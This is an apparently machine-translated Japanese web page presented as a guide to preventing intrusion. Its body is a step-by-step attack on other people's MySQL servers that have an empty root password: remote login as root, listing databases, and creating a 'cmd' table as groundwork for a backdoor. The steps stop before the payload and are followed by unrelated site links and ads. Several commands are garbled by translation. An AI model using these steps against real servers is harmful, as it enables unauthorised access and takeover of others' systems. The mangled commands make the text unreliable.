侵入を防ぐ方法: My SQL 攻撃方法の完全なリスト_PHP チュートリアル
Jul 13, 2016 pm 05:02 PM
MYSQL ユーザーの ROOT パスワードが空の場合、これは大きな脆弱性です。インターネット上でこの脆弱性を悪用する方法は数多くあります。一般的には、ASP または PHP のバックドアを作成することです。非常に面倒なだけでなく、Web サイトのディレクトリを推測するのに、相手が IIS を有効にしていない場合は、何もすることができません。 ?
その後、私は方法を考え、この脆弱性を備えたいくつかのマシンをテストすることに成功しました。ここで、攻撃方法を次のように発表します:
1. 相手の MYSQL サーバーに接続します
mysql -u root - h 192.168。 0.1
mysql.exe このプログラムは、MYSQL をインストールした BIN ディレクトリにあります
2 サーバーにどのようなデータベースがあるかを見てみましょう
mysql>show データベース
MYSQL はデフォルトでインストールされます。 TEST は 2 つのデータベースです。他のデータベースが表示される場合、それらはユーザーが作成したデータベースです。
3. データベースに入りましょう
mysql>テストを使用します
4. データベースにどのようなデータテーブルがあるかを確認します
デフォルトでは、いいえテーブルはテストに存在します。
以下は重要な部分です
5. TEST データベースの下に新しいテーブルを作成します。
mysql>create table a (cmd text); さて、 a という名前の新しいテーブルを作成しました。フィールドは 1 つだけ保存されます。テーブルでは、フィールド名は cmd であり、テキストです。
6. テーブルにコンテンツを挿入します
http://www.bkjia.com/PHPjc/631041.html
www.bkjia.com
true

人気の記事

人気の記事

ホットな記事タグ

メモ帳++7.3.1
使いやすく無料のコードエディター

SublimeText3 中国語版
中国語版、とても使いやすい

ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境

ドリームウィーバー CS6
ビジュアル Web 開発ツール

SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)

ホットトピック











携帯電話の文字サイズの設定方法(携帯電話の文字サイズを簡単に調整できます)

PHP で MySQL クエリのパフォーマンスを最適化するにはどうすればよいですか?

PHP で MySQL のバックアップと復元を使用するにはどうすればよいですか?

接続されている携帯電話の WiFi パスワードを簡単に取得する方法 (携帯電話に保存されている WiFi パスワードをすぐに見つける)

Win10 のパスワードがパスワード ポリシーの要件を満たしていない場合はどうすればよいですか? コンピューターのパスワードがポリシーの要件を満たしていない場合はどうすればよいですか?

携帯電話の画面を保護する携帯電話のスクリーンプロテクターの選び方 (携帯電話のスクリーンプロテクターを購入する際のいくつかの重要なポイントとヒント)

PHP を使用して MySQL テーブルにデータを挿入するにはどうすればよいですか?
